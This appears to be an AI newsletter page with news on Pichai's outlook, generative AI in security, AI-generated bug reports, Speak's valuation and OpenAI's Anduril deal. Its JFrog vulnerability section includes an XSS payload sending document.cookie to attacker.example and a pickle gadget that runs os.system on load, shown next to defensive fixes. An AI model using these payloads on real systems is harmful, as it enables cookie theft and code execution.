- "Towards AGI"
- Posts
- Google’s Sundar Pichai: Expect Slower AI Breakthroughs in the Coming Years
Google’s Sundar Pichai: Expect Slower AI Breakthroughs in the Coming Years
A thought leadership platform to help the world navigate towards Artificial General Intelligence. We are committed to navigating the path towards Artificial General Intelligence (AGI) by building a community of innovators, thinkers, and AI enthusiasts.
Welcome to Gen Matrix: Your Guide to GenAI Innovation and Adoption across Industries
Discover the trailblazers driving AI innovation with Gen Matrix.
Our platform showcases:
Organizations: Industry early adopters integrating Generative AI
Startups: GenAI innovators in hardware, infrastructure, and applications
Leaders: Influential figures shaping the GenAI ecosystem
Why Choose Gen Matrix?
Stay ahead with our comprehensive insights into the evolving Generative AI landscape.
Coming Soon: Our inaugural Gen Matrix launches December 2024. Sign up now to access the report!
Nominate a Trailblazer: Know an AI innovator? Nominate them for recognition in our upcoming matrix.
Gen Matrix: Where AI innovation meets practicality.
TheGen.AI News
Google’s Sundar Pichai: Expect Slower AI Breakthroughs in the Coming Years
Generative AI is unlikely to revolutionize your life much beyond its current impact by 2025, according to Sundar Pichai, CEO of Google. Speaking at the New York Times’ DealBook Summit, Pichai noted that while OpenAI’s launch of ChatGPT two years ago sparked global interest, the pace of transformative breakthroughs in the field may slow down.
“The easier advancements have already been achieved,” Pichai explained. “Moving forward, the challenges are more complex, requiring deeper innovations to reach the next level.”
The competitive landscape of generative AI, now populated by major players like Google, OpenAI, and Meta, has somewhat stabilized. Current models—such as ChatGPT, Google’s Gemini, and Meta’s Llama—will continue to improve incrementally, particularly in reasoning and executing sequences of actions. These enhancements could help businesses unlock AI’s profitability, though this milestone remains elusive despite investments in the technology, which Goldman Sachs projects will surpass $1 trillion in the coming years.
Pichai emphasized that a dramatic leap in AI’s capabilities, akin to its initial surge in popularity, is unlikely in the near future. Microsoft CEO Satya Nadella echoed this sentiment, comparing AI’s development trajectory to the Industrial Revolution, which experienced prolonged periods of gradual growth before surging ahead.
However, others in the industry, such as OpenAI CEO Sam Altman, have publicly disagreed. In November, Altman posted “there is no wall” on the social media platform X, dismissing claims that OpenAI’s newest models offered only modest improvements over their predecessors.
While the rate of breakthroughs may slow, even small advances will continue to make AI more useful for a broader audience, Pichai said. This could democratize skills like programming, potentially putting them within reach of millions of people within the next decade. Meanwhile, roles in the AI sector remain lucrative: AI trainers earn an average of $64,000 annually, while prompt engineers average over $110,000, according to ZipRecruiter.
Cybersecurity’s Gen AI Revolution: Progress with a Side of Trepidation
Generative AI is rapidly being integrated into security tools, as Chief Information Security Officers (CISOs) leverage the technology to streamline manual processes and boost productivity. However, this surge in adoption is accompanied by caution among cybersecurity professionals, a factor CISOs must consider when implementing generative AI in security operations.
Early adopters are already using generative AI to enhance security workflows and improve incident response. Security vendors are also rolling out AI-powered tools to increase efficiency for security analysts, with applications in intrusion detection, anomaly detection, malware identification, and fraud prevention.
Peter Garraghan, CEO and CTO of AI security firm Mindgard, highlights the capabilities of generative AI in recognizing patterns from disparate data and automating repetitive tasks. He notes that AI-powered tools for log management are becoming standard among vendors, furthering adoption.
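As a rough illustration of the kind of log triage such tools automate, the sketch below sends a log excerpt to a general-purpose LLM and asks for a summary and a severity call. It uses the OpenAI Python client purely as a stand-in; the model name, prompt, and triage_log helper are illustrative assumptions, not details of any vendor's product mentioned above.

```python
# Minimal sketch of LLM-assisted log triage (illustrative only; the model,
# prompt, and helper name are assumptions, not a vendor's actual tooling).
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

def triage_log(log_excerpt: str) -> str:
    """Ask a general-purpose LLM to summarize a log excerpt and flag anomalies."""
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # illustrative model choice
        messages=[
            {"role": "system",
             "content": "You are a security analyst. Summarize the log, "
                        "flag anomalies, and rate severity low/medium/high."},
            {"role": "user", "content": log_excerpt},
        ],
    )
    return response.choices[0].message.content

# Example usage with a fabricated log line:
# print(triage_log("Dec 08 03:12:44 sshd[991]: Failed password for root from 203.0.113.7"))
```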
While AI in security isn’t new—natural language processing (NLP) and machine learning have been used for years—the arrival of generative AI has accelerated innovation, reshaping AI-powered security.
Promising Potential, Notable Risks
Research by IDC identifies several use cases for generative AI in cybersecurity, including alert correlation, rule generation, policy updates, and compliance. However, enterprises need to proceed carefully, as generative AI comes with risks such as data exposure, errors due to incomplete datasets, and challenges in integrating human oversight with automated analytics.
Generative AI excels in automating tasks like report writing and incident reporting, but human intuition and complementary technologies remain essential for tasks like threat prioritization, according to Christian Have, CTO of Logpoint.
Top Use Cases and Barriers
A survey by ISC2 reveals that generative AI is already being used for operational tasks like automating administrative processes, accelerating case management, and translating natural language into policy. It’s also simplifying threat intelligence, speeding up incident reporting, and refining threat actor profiles. Other use cases include threat hunting, policy simulations, and privacy risk assessments.
Despite its potential, concerns remain. More than half of survey respondents reported data privacy and security challenges due to generative AI, while nearly two-thirds believe the technology poses significant future threats. A lack of clear strategy and insufficient training were identified as major barriers to adoption.
Globally, training around generative AI varies significantly, with North America lagging behind regions like the Middle East, Latin America, and Asia-Pacific.
A Complement, Not a Replacement
Generative AI should be viewed as a tool to complement, not replace, security operations centers (SOCs), says Rahul Tyagi, CEO of SECQAI. While it’s effective for tasks like report generation and natural language interactions, it requires human oversight to avoid risks such as false negatives.
The technology also enhances security awareness by creating realistic phishing simulations tailored to specific roles. It can streamline incident response by automating playbook execution and improve compliance mapping across regulatory frameworks.
Emerging Frontiers: Agentic AI
Experts are now looking to agentic AI as the next evolution of cybersecurity. By autonomously managing threats in real-time, agentic AI builds on generative AI’s outputs to enhance threat detection and mitigation. Joe Partlow, CTO of ReliaQuest, emphasizes its potential to reduce time spent on routine tasks, allowing analysts to focus on strategic activities like threat hunting.
As generative AI continues to evolve, its applications in cybersecurity promise increased efficiency, but organizations must balance innovation with robust strategies to manage associated risks.
BofA says +80% of young, wealthy investors want this asset—now it can be yours.
A 2024 Bank of America survey revealed something incredible: 83% of HNW respondents 43 and younger say they currently own art, or would like to.
Why? After weathering multiple recessions, newer generations say they want to diversify beyond just stocks and bonds. Luckily, Masterworks’ art investing platform is already catering to 60,000+ investors of every generation, making it easy to diversify with an asset that has overall outpaced the S&P 500 in price appreciation (1995-2023), despite a recent dip.
To date, each of Masterworks’ 23 sales has individually returned a profit to investors, and with 3 illustrative sales, Masterworks investors have realized net annualized returns of +17.6%, +17.8%, and +21.5%.
Past performance not indicative of future returns. Investing Involves Risk. See Important Disclosures at masterworks.com/cd.
TheOpensource.AI News
Open Source Developers Struggle with Flood of AI-Driven Bug Reports
The rise of AI-generated software vulnerability reports has introduced a “new era of sloppy security reports for open source projects,” frustrating developers who maintain these projects. Bug hunters relying on machine learning tools are exacerbating the problem, according to Seth Larson, security developer-in-residence at the Python Software Foundation.
In a recent blog post, Larson highlighted a surge in low-quality, spam-like, and AI-generated security reports, which require time to investigate despite being largely invalid. He pointed out similar complaints from the Curl project earlier this year, emphasizing that such reports should be treated as potentially malicious.
A recent example from the Curl project illustrates the issue. On December 8, project maintainer Daniel Stenberg responded to an AI-generated bug report, expressing his frustration. Stenberg criticized the “AI slop” reports for unnecessarily burdening maintainers, adding that these submissions often lead to prolonged discussions filled with low-value, AI-generated responses.
Generative AI models have amplified problems associated with low-quality online content, creating challenges in journalism, web searches, social media, and now open-source security. For open-source projects, these AI-assisted bug reports are especially problematic because they demand attention and evaluation from security engineers, many of whom are volunteers with limited time.
While Larson encounters relatively few AI-generated bug reports—fewer than ten per month—he views them as an early warning sign. “What’s happening to Python or pip could eventually affect more projects or occur more frequently,” he cautioned. Larson also expressed concern for maintainers handling such issues in isolation, warning that unrecognized AI-generated reports could waste valuable time and contribute to burnout.
To address this, Larson believes the open-source community needs proactive solutions, including increasing visibility and trust in contributors. He emphasized that funding and employer-donated time could help alleviate the burden on individual maintainers. However, Larson discouraged the use of AI for bug reporting, arguing that current AI systems lack the ability to understand code effectively.
Larson also urged platforms that accept vulnerability reports to implement measures limiting automated or abusive submissions. Until then, he advises bug reporters to ensure their findings are verified by humans before submission.
Open-Source AI Vulnerabilities Put ML Clients and ‘Safe’ Models at Risk
Researchers from JFrog have identified multiple vulnerabilities in open-source machine learning (ML) tools that could enable client-side malicious code execution or path traversal attacks, even when using ostensibly "safe" model formats. Detailed in a recent blog post, the flaws were found in MLflow, H2O, PyTorch, and MLeap and are part of a broader discovery of 22 vulnerabilities across 15 ML projects over the past few months.
Key Vulnerabilities in ML Tools
MLflow: Cross-Site Scripting and Arbitrary Code Execution
One of the vulnerabilities, tracked as CVE-2024-27132, affects MLflow, a platform for managing the ML lifecycle. It is an XSS vulnerability that occurs when MLflow Recipes fail to execute successfully, rendering error messages in HTML that include unsanitized variables such as failure_traceback. Attackers can exploit this by embedding malicious scripts into a recipe.yaml file, leading to XSS attacks or arbitrary code execution in environments like JupyterLab.
In JupyterLab, the exploit can execute JavaScript within the application, bypassing sandboxing to run arbitrary Python code by injecting malicious payloads into MLflow Recipes.
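As a minimal sketch of the pattern described above (not MLflow's actual code), the snippet below shows why interpolating an untrusted traceback string straight into HTML enables script injection, and how escaping it blocks the payload; render_error_page and the payload value are hypothetical.

```python
import html

def render_error_page(failure_traceback: str) -> str:
    # Vulnerable pattern: untrusted text dropped straight into HTML, so a
    # crafted recipe can smuggle a <script> payload into the error page.
    unsafe_html = f"<pre>{failure_traceback}</pre>"  # shown for contrast only

    # Mitigated pattern: escape the untrusted text before rendering it.
    return f"<pre>{html.escape(failure_traceback)}</pre>"

# Attacker-controlled value that would run as script if rendered unescaped:
payload = "<script>fetch('https://attacker.example/steal?c=' + document.cookie)</script>"
print(render_error_page(payload))
```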
H2O: Code Execution via Deserialization
Another flaw, CVE-2024-6960, was found in H2O, a distributed in-memory ML platform. The vulnerability stems from the misuse of ObjectInputStream to deserialize objects from a byte array. By injecting malicious code into a model's hyperparameter map, attackers can trigger the code upon deserialization, resulting in client-side code execution.
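The H2O flaw itself lives in Java's ObjectInputStream, but the underlying pattern is the same one that makes Python's pickle dangerous: deserializing attacker-controlled bytes can execute attacker-chosen code. The Python analogy below is a hedged illustration of that pattern, not the actual H2O exploit.

```python
import pickle
import os

class MaliciousHyperparameter:
    # pickle invokes __reduce__ during deserialization, so whoever controls
    # the serialized bytes can make the loader call an arbitrary function.
    def __reduce__(self):
        return (os.system, ("echo code ran during deserialization",))

# The attacker plants the object inside data the victim later deserializes,
# e.g. something that looks like a hyperparameter map.
blob = pickle.dumps({"max_depth": MaliciousHyperparameter()})

# The victim only intends to read hyperparameters, but loading runs the payload.
pickle.loads(blob)
```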
PyTorch: Path Traversal Exploit
In PyTorch, researchers uncovered a path traversal vulnerability in its TorchScript feature. Even when safeguards like the weights_only argument of the torch.load API are used to prevent code execution, attackers can exploit this flaw by overwriting arbitrary files on the system via the torch.save API. This could allow for malicious code execution or denial of service by corrupting essential files. The issue underscores the risks of loading untrusted ML models.
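A minimal defensive-loading sketch, assuming a checkpoint downloaded from an untrusted source: weights_only=True narrows torch.load to tensors and primitive types, which blocks the classic unpickling code-execution path, but as the researchers note it is not a complete safeguard, so the file should still be treated as untrusted input. The function name and path are illustrative.

```python
import torch

def load_untrusted_checkpoint(path: str):
    # weights_only=True restricts unpickling to tensors and primitive types,
    # blocking the classic arbitrary-code-execution path in torch.load.
    # It does not cover every risk (e.g. the TorchScript path-traversal issue
    # described above), so downloaded files remain untrusted input.
    return torch.load(path, map_location="cpu", weights_only=True)

# Illustrative usage:
# state_dict = load_untrusted_checkpoint("downloaded_model.pt")
```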
MLeap: ZipSlip Path Traversal
The final vulnerability, CVE-2023-5245, is a "ZipSlip" path traversal flaw in the MLeap library. The issue arises from the FileUtil.extract function, which does not validate file paths in a ZIP archive, allowing attackers to use traversal sequences like ../ to escape the intended directory. This flaw can be exploited during inference on zipped TensorFlow models, enabling attackers to plant malicious files outside the designated directory.
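MLeap's FileUtil.extract is JVM code, but the missing check is easy to illustrate: before extracting each archive entry, resolve its destination path and refuse anything that lands outside the target directory. The Python sketch below shows that validation under those assumptions; safe_extract is a hypothetical helper, not part of MLeap.

```python
import os
import zipfile

def safe_extract(archive_path: str, dest_dir: str) -> None:
    """Extract a ZIP archive while rejecting entries that escape dest_dir."""
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(archive_path) as zf:
        for member in zf.namelist():
            target = os.path.realpath(os.path.join(dest_root, member))
            # An entry such as "../../home/user/.bashrc" resolves outside the
            # destination directory; refuse to extract it (ZipSlip defense).
            if not target.startswith(dest_root + os.sep):
                raise ValueError(f"Blocked path traversal entry: {member}")
        zf.extractall(dest_root)
```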
Broader Implications and Risks
JFrog researchers warn that these vulnerabilities demonstrate the potential for lateral movement within ML ecosystems. Once an ML client is compromised, attackers could target connected services like model registries and MLOps pipelines to steal or backdoor ML models.
Moreover, the flaws highlight that even "safe" model formats may not be entirely secure and emphasize the importance of thoroughly validating open-source models before deployment. Safeguards such as the weights_only argument in PyTorch are not foolproof, as attackers can exploit other system interactions to achieve malicious outcomes.
Recommendations
JFrog's findings stress the critical need for improved safety protocols in handling open-source ML models. Users and developers are advised to:
Avoid loading untrusted models without thorough validation.
Implement robust input sanitization and directory validation in tools like MLflow and MLeap.
Regularly update and patch ML libraries to mitigate known vulnerabilities.
Enhance awareness of the risks associated with open-source ML tools and invest in stronger safeguards for managing ML pipelines.
These vulnerabilities underscore the ongoing challenge of securing open-source ML projects, where even established tools can introduce risks that threaten the broader ecosystem.
TheClosedsource.AI News
AI-Powered Language Learning Startup Hits $1 Billion Valuation
Speak, a startup leveraging artificial intelligence to aid language learning, has reached a $1 billion valuation following a new funding round, doubling its value in just six months. The company announced on Tuesday that it secured $78 million in funding, led by venture capital firm Accel, with contributions from existing backers like the OpenAI Startup Fund, Khosla Ventures, and Y Combinator. Speak has now raised a total of $162 million.
Unlike competitors such as Rosetta Stone and Duolingo, which emphasize gamified learning experiences, Speak aims to improve users' fluency through AI-driven, conversational practice. Its app enables users to engage in verbal interactions with an AI system, providing real-time feedback through a speech recognition model that adapts to diverse accents.
“Traditionally, achieving fluency required a human tutor or teacher,” said Andrew Hsu, co-founder and Chief Technology Officer. “Until recently, the technology to create a conversational AI partner simply didn’t exist.”
Speak’s latest funding highlights its success in the consumer AI market, which has seen slower funding growth compared to enterprise AI. While enterprise AI startups have raised $16.4 billion this year, consumer AI companies have attracted less than half that amount, according to PitchBook.
“There are many consumer AI companies chasing potential, but few have turned that promise into meaningful revenue,” said Ben Quazzo, a partner at Accel who led the investment and is joining Speak’s board.
The startup operates on a subscription model, with premium plans starting at $20 per month. CEO Connor Zwick shared that Speak is nearing profitability, with revenues in the eight-figure range. Although its primary focus has been on individual users, Speak’s enterprise offering is gaining traction. Zwick noted that eight of Korea’s 10 largest employers have adopted Speak for Business to help employees learn English. With the new funding, Speak plans to expand its presence in Southeast Asia, Europe, and the United States while supporting additional languages by the end of next year.
OpenAI Partners With Anduril To Develop AI-Powered Anti-Drone Systems
OpenAI has entered its first significant defense partnership through a collaboration with Anduril Industries, a defense startup founded by Oculus VR co-founder Palmer Luckey. Anduril, which produces military technology such as sentry towers, communication jammers, drones, and autonomous submarines, announced the partnership will integrate OpenAI's models into its systems. The goal is to process time-sensitive data more efficiently, reduce the workload for human operators, and enhance situational awareness.
Anduril already supplies counter-drone technology to the U.S. government and has recently been tasked with developing and testing unmanned fighter jets under a $100 million contract with the Pentagon’s Chief Digital and AI Office.
OpenAI clarified to the Washington Post that this collaboration focuses on defending against unmanned aerial threats, such as drones, and does not extend to technologies directly associated with human casualties. Both OpenAI and Anduril emphasize that the partnership aims to help the U.S. maintain parity with China's advancements in AI, aligning with broader government investments in AI development for national security.
"OpenAI builds AI to benefit as many people as possible, and supports U.S.-led efforts to ensure the technology upholds democratic values," said OpenAI CEO Sam Altman. He noted that the partnership would aid in protecting U.S. military personnel and help the defense community responsibly utilize AI technologies.
This collaboration comes after OpenAI quietly revised its policy in January, removing explicit prohibitions on applications involving "military and warfare." However, OpenAI insists its tools cannot be used to harm individuals, develop weapons, or conduct surveillance. The updated policy allows national security use cases aligned with OpenAI’s mission, such as securing critical infrastructure through partnerships with agencies like DARPA.
OpenAI has reportedly been exploring opportunities with the U.S. military and national security offices over the past year, leveraging connections such as a former security officer at Palantir. The move mirrors similar initiatives by other AI companies. Anthropic, creators of Claude, recently partnered with Palantir and Amazon Web Services to provide AI tools to defense and intelligence agencies for classified operations.
There are also rumors suggesting Palantir CTO Shyam Sankar might be considered for a prominent role at the Pentagon. Sankar has previously criticized traditional government procurement processes, advocating for a shift toward leveraging commercial technologies instead of relying solely on major defense contractors.
There’s a reason 400,000 professionals read this daily.
Join The AI Report, trusted by 400,000+ professionals at Google, Microsoft, and OpenAI. Get daily insights, tools, and strategies to master practical AI skills that drive results.
Don’t miss out on the insights driving the future of Artificial Intelligence! Join a community of researchers, developers, and AI enthusiasts to stay ahead of the curve in Generative AI. Each edition delivers exclusive updates, expert analysis, and thought-provoking discussions straight to your inbox. Subscribe today and be part of the journey toward AGI innovation.
Contact us for any paid collaborations and sponsorships.
Unlock the future of problem solving with Generative AI!

If you're a professional looking to elevate your strategic insights, enhance decision-making, and redefine problem-solving with cutting-edge technologies, the Consulting in the age of Gen AI course is your gateway. It is perfect for those ready to integrate Generative AI into their work and stay ahead of the curve.
In a world where AI is rapidly transforming industries, businesses need professionals and consultants who can navigate this evolving landscape. This learning experience arms you with the essential skills to leverage Generative AI for improving problem-solving, decision-making, or advising clients.
Join us and gain firsthand experience in how state-of-the-art GenAI technology can elevate your problem-solving skills to new heights. This isn’t just learning; it’s your competitive edge in an AI-driven world.